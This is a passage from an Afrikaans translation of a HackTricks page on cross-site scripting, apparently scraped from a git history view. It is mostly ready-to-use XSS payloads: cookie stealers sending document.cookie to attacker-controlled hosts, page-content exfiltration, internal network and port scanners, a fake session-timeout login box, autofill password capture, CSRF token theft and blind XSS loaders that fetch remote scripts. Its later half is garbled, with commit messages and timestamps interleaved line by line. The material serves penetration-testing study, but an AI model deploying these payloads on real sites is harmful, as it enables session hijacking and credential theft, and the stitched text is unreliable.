((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) +(o^_^o))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ (ﾟｰﾟ)+ (o^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (c^_^o)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟΘﾟ)+ ((o^_^o) +(o^_^o))+ (ﾟｰﾟ)+ (ﾟДﾟ)[ﾟεﾟ]+(ﾟｰﾟ)+ ((o^_^o) - (ﾟΘﾟ))+ (ﾟДﾟ)[ﾟεﾟ]+((ﾟｰﾟ) + (ﾟΘﾟ))+ (ﾟΘﾟ)+ (ﾟДﾟ)[ﾟoﾟ]) (ﾟΘﾟ)) ('_');
```

```javascript
// It's also possible to execute JS code only with the chars: []`+!${}
```
## XSS algemene lading

### Verskeie lading in 1

{% content-ref url="steal-info-js.md" %}
[steal-info-js.md](steal-info-js.md)
{% endcontent-ref %}

### Haal Koekies op
```javascript
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
<script>var i=new Image();i.src="http://<YOUR_SERVER_IP>/?c="+document.cookie</script>
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
```
{% hint style="info" %}
Jy sal nie in staat wees om die koekies vanaf JavaScript te benader as die HTTPOnly-vlag in die koekie ingestel is nie. Maar hier het jy [sekere maniere om hierdie beskerming te omseil](../hacking-with-cookies/#httponly) as jy gelukkig genoeg is.
{% endhint %}

### Steel Bladsy-inhoud
```javascript
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
var attacker = "http://10.10.14.8/exfil";
var xhr  = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open('GET', url, true);
xhr.send(null);
```
### Vind interne IP's
```html
<script>
var q = []
var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
var wait = 2000
var n_threads = 51

// Prepare the fetchUrl functions to access all the possible
for(i=1;i<=255;i++){
q.push(
function(url){
return function(){
fetchUrl(url, wait);
}
}('http://192.168.0.'+i+':8080'));
}

// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for(i=1; i<=n_threads; i++){
if(q.length) q.shift()();
}

function fetchUrl(url, wait){
console.log(url)
var controller = new AbortController(), signal = controller.signal;
fetch(url, {signal}).then(r=>r.text().then(text=>
{
location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now()
}
))
.catch(e => {
if(!String(e).includes("The user aborted a request") && q.length) {
q.shift()();
}
});

setTimeout(x=>{
controller.abort();
if(q.length) {
q.shift()();
}
}, wait);
}
</script>
```
### Poortskander (fetch)
```javascript
const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }
```
### Poortskander (websockets)
```python
var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}
```
_Kort tye dui op 'n reagerende poort_ _Langer tye dui op geen reaksie nie._

Gaan die lys van verbode porte in Chrome na [**hier**](https://src.chromium.org/viewvc/chrome/trunk/src/net/base/net\_util.cc) en in Firefox [**hier**](https://www-archive.mozilla.org/projects/netlib/portbanning#portlist).

### Boks om vir geloofsbriewe te vra
```markup
<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>
```
### Self-vul wagwoorde vasvangst
```javascript
<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
```
Wanneer enige data in die wagwoordveld ingevoer word, word die gebruikersnaam en wagwoord na die aanvaller se bediener gestuur, selfs as die klient 'n gestoorde wagwoord kies en niks skryf nie, sal die geloofsbriewe uitgelek word.

### Sleutelstroker

Deur net op github te soek, het ek 'n paar verskillende gevind:

* [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
* [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
* [https://github.com/hakanonymos/JavascriptKeylogger](https://github.com/hakanonymos/JavascriptKeylogger)
* Jy kan ook metasploit gebruik `http_javascript_keylogger`

### Steel CSRF-token
```javascript
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```
### Steel van PostMessage-boodskappe
```markup
<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
</script>
```
### Misbruik van Dienswerkers

{% content-ref url="abusing-service-workers.md" %}
[abusing-service-workers.md](abusing-service-workers.md)
{% endcontent-ref %}

### Toegang tot Skaduwee-DOM

{% content-ref url="shadow-dom.md" %}
[shadow-dom.md](shadow-dom.md)
{% endcontent-ref %}

### Meertaliges

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss_polyglots.txt" %}

### Blinde XSS-payloads

Jy kan ook gebruik maak van: [https://xsshunter.com/](https://xsshunter.com)
```markup
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>

<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>

<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">

<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>

<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>

<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>

<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>

<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
### Regex - Toegang tot Versteekte Inhoud

Vanaf [**hierdie skryfstuk**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) is dit moontlik om te leer dat selfs al verdwyn sommige waardes uit JS, dit steeds moontlik is om hulle te vind in JS-eienskappe in verskillende objekte. Byvoorbeeld, 'n invoer van 'n REGEX is steeds moontlik om dit te vind nadat die waarde van die invoer van die regex verwyder is:
```javascript
// Do regex with flag
flag="CTF{FLAG}"
re=/./g
re.test(flag);

// Remove flag value, nobody will be able to get it, right?
flag=""

// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
```
### Brute-Force Lys

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xss.txt" %}

## XSS Misbruik van ander kwesbaarhede

### XSS in Markdown

Kan Markdown-kode inspuit wat gerender sal word? Dalk kan jy XSS kry! Kontroleer:

{% content-ref url="xss-in-markdown.md" %}
[xss-in-markdown.md](xss-in-markdown.md)
{% endcontent-ref %}

### XSS na SSRF

Het jy XSS op 'n **webwerf wat kaching gebruik**? Probeer **om dit na SSRF op te gradeer** deur Edge Side Include Injection met hierdie lading:
```python
<esi:include src="http://yoursite.com/capture" />
```
Gebruik dit om koekiebeperkings, XSS-filters en baie meer te omseil!\
Meer inligting oor hierdie tegniek hier: [**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md).

### XSS in dinamies geskep PDF

As 'n webbladsy 'n PDF skep deur gebruikersbeheerde insette te gebruik, kan jy probeer om die **robot te mislei** wat die PDF skep om **arbitrêre JS-kode uit te voer**.\
Dus, as die **PDF-skepper-robot** 'n soort **HTML-tjokkies vind**, gaan dit hulle **interpreteer**, en jy kan van hierdie gedrag **misbruik** maak om 'n **Bediener XSS** te veroorsaak.

{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
{% endcontent-ref %}

As jy nie HTML-tjokkies kan inspuit nie, kan dit die moeite werd wees om te probeer om **PDF-data in te spuit**:

{% content-ref url="pdf-injection.md" %}
[pdf-injection.md](pdf-injection.md)
{% endcontent-ref %}

### XSS in Amp4Email

AMP, gemik op die versnelling van webbladprestasie op mobiele toestelle, sluit HTML-tjokkies aangevul deur JavaScript in om funksionaliteit te verseker met 'n klem op spoed en sekuriteit. Dit ondersteun 'n verskeidenheid komponente vir verskeie kenmerke, toeganklik via [AMP-komponente](https://amp.dev/documentation/components/?format=websites).

Die [**AMP vir E-pos**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) formaat brei spesifieke AMP-komponente uit na e-posse, wat ontvangers in staat stel om direk met inhoud in hul e-posse te interaksioneer.

Voorbeeld [**writeup XSS in Amp4Email in Gmail**](https://adico.me/post/xss-in-gmail-s-amp4email).

### XSS-lêers oplaai (svg)

Laai 'n lêer soos die volgende een op as 'n beeld (vanaf [http://ghostlulz.com/xss-svg/](http://ghostlulz.com/xss-svg/)):
```markup
Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--
```

```markup
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>
```

```markup
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>
```

```svg
<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>

<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>
```

```html
<svg><use href="//portswigger-labs.net/use_element/upload.php#x"/></svg>
```

```xml
<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
```
Vind **meer SVG-vragte** in [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)

## Verskeie JS-truuks & relevante inligting

{% content-ref url="other-js-tricks.md" %}
[other-js-tricks.md](other-js-tricks.md)
{% endcontent-ref %}

## XSS-bronne

* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20injection)
* [http://www.xss-payloads.com](http://www.xss-payloads.com) [https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt](https://github.com/Pgaijin66/XSS-Payloads/blob/master/payload.txt) [https://github.com/materaj/xss-list](https://github.com/materaj/xss-list)
* [https://github.com/ismailtasdelen/xss-payload-list](https://github.com/ismailtasdelen/xss-payload-list)
* [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec)
* [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html)

<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>

As jy belangstel in **hacking loopbaan** en hack die onhackbare - **ons is aan die werf!** (_vloeiende Pools geskrewe en gespreek benodig_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS-familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag. 

</details>
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								# XSS (Cross Site Scripting)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								<figure><img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
-												GitBook: [#3157] No subject

											
										
										
											2022-04-30 20:31:18 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jy belangstel in **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die aanstel!** (_vloeiende Pools geskrewe en gesproke vereis_).
-												GitBook: [#3157] No subject

											
										
										
											2022-04-30 20:31:18 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								{% embed url="https://www.stmcyber.com/careers" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Metodologie
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+. Kontroleer of **enige waarde wat jy beheer** (_parameters_, _pad_, _koppe_?, _koekies_?) in die HTML **weerspieël** word of deur **JS**-kode **gebruik** word.
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+. Vind die konteks waar dit weerspieël/gebruik word.
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+. Indien **weerspieël**
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+. Kontroleer **watter simbole jy kan gebruik** en afhangende daarvan, berei die lading voor:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. In **rou HTML**:
 . Kan jy nuwe HTML-etikette skep?
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+. Kan jy gebeure of eienskappe gebruik wat die `javascript:` protokol ondersteun?
 . Kan jy beskerming omseil?
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+. Word die HTML-inhoud deur enige kliëntkant-JS-enjin geïnterpreteer (_AngularJS_, _VueJS_, _Mavo_...), jy kan 'n [**Kliëntkant-sjablooninspuiting**](../client-side-template-injection-csti.md) misbruik.
 . As jy nie HTML-etikette kan skep wat JS-kode uitvoer nie, kan jy 'n [**Hangende Merk - HTML-skriptlose inspuiting**](../dangling-markup-html-scriptless-injection/) misbruik?
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Binne 'n **HTML-etiket**:
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+. Kan jy na rou HTML-konteks ontsnap?
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+. Kan jy nuwe gebeure/eienskappe skep om JS-kode uit te voer?
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Ondersteun die eienskap waarin jy vasgevang is JS-uitvoering?
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+. Kan jy beskerming omseil?
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+. Binne **JavaScript-kode**:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Kan jy die `<script>`-etiket ontsnap?
 . Kan jy die string ontsnap en verskillende JS-kode uitvoer?
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+. Is jou insette in sjabloonliterale \`\`?
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+. Kan jy beskerming omseil?
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+. JavaScript **funksie** wat **uitgevoer** word
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Jy kan die naam van die funksie aandui om uit te voer. bv.: `?callback=alert(1)`
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+. Indien **gebruik**:
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+. Jy kan 'n **DOM XSS** uitbuit, let op hoe jou inset beheer word en of jou **beheerde inset deur enige sink gebruik word**.
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								Wanneer jy aan 'n komplekse XSS werk, mag jy dit interessant vind om van die volgende te weet:
-												GitBook: [#3124] No subject

											
										
										
											2022-04-25 12:04:04 +00:00
 								{% content-ref url="debugging-client-side-js.md" %}
 								[debugging-client-side-js.md](debugging-client-side-js.md)
 								{% endcontent-ref %}
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								## Weerspieëlde waardes
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								Om 'n XSS suksesvol uit te buit, is die eerste ding wat jy moet vind 'n **waarde wat deur jou beheer word en wat in die webbladsy weerspieël word**.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								* **Tussenliggend weerspieël**: As jy vind dat die waarde van 'n parameter of selfs die pad in die webbladsy weerspieël word, kan jy 'n **Weerspieëlde XSS** uitbuit.
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								* **Gestoor en weerspieël**: As jy vind dat 'n waarde wat deur jou beheer word in die bediener gestoor word en elke keer as jy 'n bladsy besoek weerspieël word, kan jy 'n **Gestoorde XSS** uitbuit.
 								* **Toegang via JS**: As jy vind dat 'n waarde wat deur jou beheer word deur JS gebruik word, kan jy 'n **DOM XSS** uitbuit.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Kontekste
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['generic-methodologies-and-resources/external-recon-methodol

											
										
										
											2024-02-23 16:45:55 +00:00
+								Wanneer jy probeer om 'n XSS uit te buit, is die eerste ding wat jy moet weet **waar jou inset weerspieël word**. Afhangende van die konteks, sal jy arbitrêre JS-kode op verskillende maniere kan uitvoer.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								### Rou HTML
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jou inset **weerspieël word op die rou HTML**-bladsy, sal jy enige **HTML-etiket** moet misbruik om JS-kode uit te voer: `<img , <iframe , <svg , <script` ... dit is net 'n paar van die vele moontlike HTML-etikette wat jy kan gebruik.\
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Hou ook [Kliëntkant-sjablooninspuiting](../client-side-template-injection-csti.md) in gedagte.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Binne HTML-etiketattribuut
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								As jou inset binne die waarde van die attribuut van 'n etiket weerspieël word, kan jy probeer:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+. Om **uit die attribuut en uit die etiket te ontsnap** (dan sal jy in die rou HTML wees) en nuwe HTML-etiket skep om te misbruik: `"><img [...]`
 . As jy **uit die attribuut kan ontsnap maar nie uit die etiket nie** (`>` is gekodeer of verwyder), afhangende van die etiket kan jy 'n **gebeurtenis skep** wat JS-kode uitvoer: `" autofocus onfocus=alert(1) x="`
 . As jy **nie uit die attribuut kan ontsnap nie** (`"` word gekodeer of verwyder), dan afhangende van **watter attribuut** jou waarde weerspieël en **of jy al die waarde beheer of net 'n deel daarvan** sal jy dit kan misbruik. Byvoorbeeld, as jy 'n gebeurtenis soos `onclick=` beheer, sal jy arbitrêre kode kan laat uitvoer wanneer dit geklik word. 'n Ander interessante **voorbeeld** is die attribuut `href`, waar jy die `javascript:` protokol kan gebruik om arbitrêre kode uit te voer: **`href="javascript:alert(1)"`**
 . As jou inset binne "**onuitbuitbare etikette**" weerspieël word, kan jy die **`accesskey`-truk** probeer om die kwesbaarheid te misbruik (jy sal 'n soort sosiale ingenieur nodig hê om dit te misbruik): **`" accesskey="x" onclick="alert(1)" x="`**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								Vreemde voorbeeld van Angular wat XSS uitvoer as jy 'n klassenaam beheer:
 								```html
 								<div ng-app>
 								<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
 								</div>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:51:58 +00:00
+								### Binne JavaScript-kode
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
+								In hierdie geval word jou inset weerspieël tussen **`<script> [...] </script>`** etikette van 'n HTML-bladsy, binne 'n `.js` lêer of binne 'n eienskap wat die **`javascript:`** protokol gebruik:
-												GITBOOK-3770: No subject

											
										
										
											2023-02-07 10:56:16 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-03-17 16:40:53 +00:00
